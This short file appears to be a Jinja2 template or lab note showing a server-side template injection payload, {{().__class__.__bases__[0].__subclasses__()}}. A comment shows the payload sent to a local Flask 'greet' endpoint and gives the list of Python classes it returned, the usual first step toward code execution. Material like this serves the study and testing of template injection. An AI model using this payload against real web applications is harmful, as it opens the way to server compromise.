{{().__class__.__bases__[0].__subclasses__()}}
{#
# command: http://127.0.0.1:5000/greet?name={{().__class__.__bases__[0].__subclasses__()}}
#  return:
# 
# Hello [<class 'type'>, <class 'async_generator'>, <class
# 'bytearray_iterator'>, <class 'bytearray'>, <class 'bytes_iterator'>, <class
# ...
# 'werkzeug._reloader.ReloaderLoop'>]
#}